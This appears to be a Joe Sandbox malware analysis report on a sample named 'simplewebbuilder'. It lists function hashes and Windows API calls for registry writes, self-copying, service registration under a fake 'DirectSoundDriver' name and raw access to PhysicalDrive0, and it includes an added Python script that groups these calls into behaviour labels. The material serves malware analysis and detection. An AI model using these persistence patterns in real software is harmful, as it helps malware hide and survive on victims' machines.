• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
• String ID: \\.\PhysicalDrive0
• API String ID: 3786717961-1180397377
• Opcode ID: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
• Instruction ID: 8e9e512524d6225b66ba562a13c5a7f417e6abf84bb9e2e9af9964b6e94f018c
• Opcode Fuzzy Hash: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
• Instruction Fuzzy Hash: CE318B71D01218EACB21EFA5CD849EFBBB8FF41750F20407AE514B22A0E7785E45CB98
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
Memory Dump Source
• Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
• Instruction ID: 707de1fed31c9c9cc4664e0c652b34d30681ff1bd6120e3740f17fb32104e870
• Opcode Fuzzy Hash: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
• Instruction Fuzzy Hash: 42D05B20408100C6C21417E555550783765DD55330B11CF7690FE714E28A7904CBA61E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
• Instruction ID: 789ae47976887c049220f5e5451efe9368f5d3cf5dad1ab7781d5bfdbef77079
• Opcode Fuzzy Hash: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
• Instruction Fuzzy Hash: 06C0022090C411D6C6186BD0AB540716638E65A356F208ABAD45BB08E68F7D088EF62E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetVersion.KERNEL32 ref: 00403138
  • Part of subcall function 0040344A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
  • Part of subcall function 0040344A: HeapDestroy.KERNEL32 ref: 0040349A
• GetCommandLineA.KERNEL32 ref: 00403186
• GetStartupInfoA.KERNEL32(?), ref: 004031B1
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004031D4
  • Part of subcall function 0040322D: ExitProcess.KERNEL32 ref: 0040324A
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
• String ID:
• API String ID: 2057626494-0
• Opcode ID: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
• Instruction ID: 617ad2e6012ff9c1e059bad989762b11f9743b1554ab2ac8c32517e064b37c31
• Opcode Fuzzy Hash: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
• Instruction Fuzzy Hash: E2217CB1940615AADB04EFB6DE46A6E7BB8EB45714F10413EF605BB2D1DB384900CBAC
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• CommandLineToArgvW.SHELL32 ref: 0040D869
• GetLocalTime.KERNEL32(0040C2C0), ref: 0040DA36
Strings
Memory Dump Source
• Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: ArgvCommandLineLocalTime
• String ID: XiM#
• API String ID: 561774760-2404075716
• Opcode ID: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
• Instruction ID: c9dd54a2f6a0a9ef6b395da460124d2a44ef0955a0893859fe936c8b588cfaf7
• Opcode Fuzzy Hash: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
• Instruction Fuzzy Hash: 70D0C935C08102EBC2106BE59A4906876A1AB59355721053BE183F26E0DF78444AEA2E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32(?,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 0040482F
• TerminateProcess.KERNEL32(00000000,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 00404836
• ExitProcess.KERNEL32 ref: 004048B0
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
• Instruction ID: 144ee4ae690132be24d3b7439d4fde7c7cee5440a8ed28615e41e0a9dc7ff649
• Opcode Fuzzy Hash: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
• Instruction Fuzzy Hash: D601DB77640350DEEA10BF55FE85A1677A4FBC5750B10893FE540721E2C734AC41CA6D
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
  • Part of subcall function 00403302: GetVersionExA.KERNEL32 ref: 00403321
• HeapDestroy.KERNEL32 ref: 0040349A
  • Part of subcall function 004034A7: HeapAlloc.KERNEL32(00000000,00000140,00403483,000003F8), ref: 004034B4
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
• Instruction ID: e60f5d10070dd6772d4a54549668055c4e54cd76725331d0105a0707e5516faa
• Opcode Fuzzy Hash: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
• Instruction Fuzzy Hash: 58F0657461430299EB215F719E4772A2E98DB54797F10453BF406FC1D0EB7C86819909
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 116 40218d-40dc54 RegSetValueExA RegCloseKey
APIs
• RegSetValueExA.KERNELBASE(?,?,?,00000004), ref: 0040D70D
• RegCloseKey.KERNELBASE(?,?,00000004), ref: 0040DC54
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: CloseValue
• String ID:
• API String ID: 3132538880-0
• Opcode ID: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
• Instruction ID: 6dcc4c43cecca713c479bc083516d2f00d0eb767f36aa46da61f939dff5b1dac
• Opcode Fuzzy Hash: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
• Instruction Fuzzy Hash: 66D09E70808005EFCF8567908E48AA97A786B04345F110076E243764D48BB5099AAA1E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 127 402981-402989 RegOpenKeyExA 128 4029be 127->128 129 40d0d4-40d8a4 128->129 130 4029c4-4029c7 128->130 130->129 131 40d5c4-40d976 130->131
APIs
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
• Instruction ID: 7df17e09f2432b10eb6c2be66ef450d18aff74beed7de32105507e4b1735c4b5
• Opcode Fuzzy Hash: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
• Instruction Fuzzy Hash: 7DD09E74D1801AEBD705CAA08E08AFA72A87B04304F5049379557B21C0D7B8D50E575A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 140 40226a-402272 RegQueryValueExA 141 40d0ce 140->141 142 40d8a4 141->142 143 40d0d4-40d0d6 141->143 143->142
APIs
• RegQueryValueExA.KERNELBASE ref: 0040226A
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
• Instruction ID: cd8f19b0e75b23b67f056bc5011eb5fb97471f13f622c60d442dd2a780a17e7d
• Opcode Fuzzy Hash: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
• Instruction Fuzzy Hash: C7B09230E18102FADB255FB89F0C62A29647F447847364D36A857F10E0D6BD8A0AB51E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 145 402a7c-40dc37 CreateDirectoryA
APIs
• CreateDirectoryA.KERNELBASE ref: 0040DC31
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
• Opcode ID: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
• Instruction ID: 0e17b99c545429624e35815a83348e511bd8a70e8ccf8bf3b2f2de9a1ad67a53
• Opcode Fuzzy Hash: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
• Instruction Fuzzy Hash: 65A0016599A214DAE22127D05A19A6A69286A1A78132580376382B10E249B9140FA6AF
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 147 40d451-40d458 OpenSCManagerA
APIs
Memory Dump Source
• Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
• Instruction ID: 1e8d8f9be64fba067e26ba2d448d73f2a2dd91e1f4fcd8f5598b6fd75d9e172d
• Opcode Fuzzy Hash: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
• Instruction Fuzzy Hash: F8A002A02045018AC6915F205FDC419255F6640316B611839D243E00E5CA789449A52E
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyExA.KERNELBASE ref: 0040D62B
Memory Dump Source
• Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
• Instruction ID: c74dabf9949369d5c62da8fd438f69c3850cb3cf4aa8c6dce4d298867a589fab
• Opcode Fuzzy Hash: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
• Instruction Fuzzy Hash: 0C9002203045019AD2501A315B0C2152598550464971104395647E1090DA748109991E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 149 40d578-40d57e RegCloseKey
APIs
Memory Dump Source
• Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
• Instruction ID: 046338ef49b4dad716f2584d43b15ea982064a3712732217e229f8b42be1af81
• Opcode Fuzzy Hash: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
• Instruction Fuzzy Hash: FC900271955901A7C24007505F2D9153550611870132184376B46710E189F95407570E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 148 402994-40299a CopyFileA
APIs
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
• Instruction ID: 8a9b989459de8ba4b383989f71eab82c3655f6d4a6f9597199558f747d970bc5
• Opcode Fuzzy Hash: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
• Instruction Fuzzy Hash: 1A9002302041019AD2040A315B9C715276855046C131544796847E0090DA7880496529
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: lstrcmpi
• String ID:
• API String ID: 1586166983-0
• Opcode ID: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
• Instruction ID: 1999ed2a319cb111f58d93e36599d65504c6bfb494e199db35daf75dc5fcdc4b
• Opcode Fuzzy Hash: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
• Instruction Fuzzy Hash: 1F900260304201EFE2000B325F0C31525A46704641712443D5447E0194DA7C8005956A
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: CreateService
• String ID:
• API String ID: 1592570254-0
• Opcode ID: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
• Instruction ID: 0602c40c1dbccdcc73e530ffc71a58eccebc0d0648145afbdcc57a56ac06b62b
• Opcode Fuzzy Hash: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
• Instruction Fuzzy Hash: 1BA02220808002CEC2002FE00E88028A0080082308330883EC30BF00C0CA38C88FB03F
Uniqueness

Uniqueness Score: -1.00%
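The function entries above spread the persistence-relevant API usage of this dump (RegCreateKeyExA/RegSetValueExA, CreateDirectoryA/CopyFileA, OpenSCManagerA, CreateService) across several records, and for some of them the "APIs" section is empty, so the API name survives only in the control_flow_graph label or the API ID. The Python script below is an added example, not part of the Joe Sandbox report or of its tooling: it parses the "• Api.Module(args), ref: addr" lines and the control_flow_graph labels from a constructed sample copied from this listing, recovers the service name argument of RegisterServiceCtrlHandlerA as the sandbox displays it, and groups the observed APIs under behaviour labels. The behaviour labels, their API sets and the regexes are assumptions made for this example (they are not Joe Sandbox signatures, and the text form may differ in other report exports).

```python
import re

# Constructed sample: API reference lines and control_flow_graph labels copied
# from the function listing above (process 16, image base 0x400000). Functions
# whose "APIs" section is empty on the page (OpenSCManagerA, CopyFileA) carry
# the name only in the graph label, so both forms are parsed.
SAMPLE_LISTING = """
control_flow_graph 116 40218d-40dc54 RegSetValueExA RegCloseKey
• RegSetValueExA.KERNELBASE(?,?,?,00000004), ref: 0040D70D
• RegCloseKey.KERNELBASE(?,?,00000004), ref: 0040DC54
control_flow_graph 127 402981-402989 RegOpenKeyExA 128 4029be 127->128 129 40d0d4-40d8a4 128->129
control_flow_graph 140 40226a-402272 RegQueryValueExA 141 40d0ce 140->141 142 40d8a4 141->142
• RegQueryValueExA.KERNELBASE ref: 0040226A
control_flow_graph 145 402a7c-40dc37 CreateDirectoryA
• CreateDirectoryA.KERNELBASE ref: 0040DC31
control_flow_graph 147 40d451-40d458 OpenSCManagerA
• RegCreateKeyExA.KERNELBASE ref: 0040D62B
control_flow_graph 148 402994-40299a CopyFileA
• RegisterServiceCtrlHandlerA.ADVAPI32(DirectSoundDriver 2.36.198.67,0040235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040C418), ref: 00402420
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
"""

# "• Api.Module(args), ref: addr"; the argument list is optional (see RegQueryValueExA).
API_REF_RE = re.compile(
    r"^\s*•?\s*(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "control_flow_graph <node> <start>-<end> <labels and edges...>"
GRAPH_RE = re.compile(r"^\s*control_flow_graph\s+\d+\s+[0-9a-fA-F]+-[0-9a-fA-F]+(?P<rest>.*)$")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")

# Assumed behaviour labels for this example; every API in a set must be present.
BEHAVIOUR_RULES = {
    "registry_value_write": {"RegCreateKeyExA", "RegSetValueExA"},
    "self_copy_to_directory": {"CreateDirectoryA", "CopyFileA"},
    "scm_access": {"OpenSCManagerA"},
    "service_main_entry": {"RegisterServiceCtrlHandlerA", "SetServiceStatus", "CreateThread"},
}


def parse_api_refs(text):
    """One record per API reference line: name, module, argument list, call-site address."""
    refs = []
    for line in text.splitlines():
        m = API_REF_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        refs.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return refs


def parse_graph_apis(text):
    """API names carried by control_flow_graph labels (node ids, hex ranges and edges are skipped)."""
    names = set()
    for line in text.splitlines():
        m = GRAPH_RE.match(line)
        if not m:
            continue
        for tok in m.group("rest").split():
            # An API label is a capitalised alphanumeric token that is not a pure hex number.
            if tok[0].isupper() and tok.isalnum() and not HEX_RE.fullmatch(tok):
                names.add(tok)
    return names


def observed_apis(text):
    return {r["api"] for r in parse_api_refs(text)} | parse_graph_apis(text)


def match_behaviours(apis):
    return sorted(name for name, need in BEHAVIOUR_RULES.items() if need <= apis)


def service_name(refs):
    """First argument of RegisterServiceCtrlHandler{A,W}, as displayed by the sandbox."""
    for r in refs:
        if r["api"].startswith("RegisterServiceCtrlHandler") and r["args"]:
            return r["args"][0]
    return None


def analyse(text):
    refs = parse_api_refs(text)
    apis = observed_apis(text)
    return {
        "api_count": len(refs),
        "apis": sorted(apis),
        "behaviours": match_behaviours(apis),
        "service_name": service_name(refs),
        # call sites in address order: code layout, not execution order
        "refs_in_order": [(f"{r['ref']:08X}", r["api"]) for r in sorted(refs, key=lambda r: r["ref"])],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_LISTING), indent=2))
```

The "ref:" value is the address of the call site in the dumped image, so sorting by it gives the order the calls appear in the code, not the order they ran; the dynamic API trace elsewhere in the report is the place to read execution order. Treat the service name the same way: it is the string the sandbox rendered for the first argument, and a second string following it in the same argument column should be checked against the Strings section before being used as an indicator.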

                                                                                                                            APIs
                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(DirectSoundDriver 2.36.198.67,0040235E), ref: 004023C1
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 00402420
                                                                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 00402480
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 004024CA
                                                                                                                            Strings
                                                                                                                            • DirectSoundDriver 2.36.198.67, xrefs: 004023BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                            • String ID: DirectSoundDriver 2.36.198.67
                                                                                                                            • API String ID: 3346042915-3753546761
                                                                                                                            • Opcode ID: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                            • Instruction ID: 1a01264c41601166a4e66a8b54459f3afdfc7a3d4d59415bdd3a2783c39f4923
                                                                                                                            • Opcode Fuzzy Hash: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                            • Instruction Fuzzy Hash: F821D670401210EBD2105F26EFE996A7EACFBC9754751823EE544B22B1C7B90409DF6C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B05
                                                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406B21
                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7U@ ,?,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B6A
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406BA2
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 352835431-3990396050
                                                                                                                            • Opcode ID: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                            • Instruction ID: 02e506ee65740420ae3233abb4e535ac9c0d9cfafd58d7118099ca6790f9c1e8
                                                                                                                            • Opcode Fuzzy Hash: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                            • Instruction Fuzzy Hash: FE51AE71500209EFDF219F54CE49EAF7FB5FB48750F11412AF952B22A0D73A8861EB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004053C1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 00406735
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040674D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040675E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040676B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                            • API String ID: 2238633743-4044615076
                                                                                                                            • Opcode ID: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                            • Instruction ID: 7fc34865fb6cd96f75d35faf7655371ce0829d27f510573cbc416552b2b19a82
                                                                                                                            • Opcode Fuzzy Hash: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                            • Instruction Fuzzy Hash: 5F018871200301EFCB209FB59EC096F3AE89B98745316183FB145F3291DE7A88118B6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 004069B9
                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 004069D3
                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A07
                                                                                                                            • MultiByteToWideChar.KERNEL32(7U@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A3F
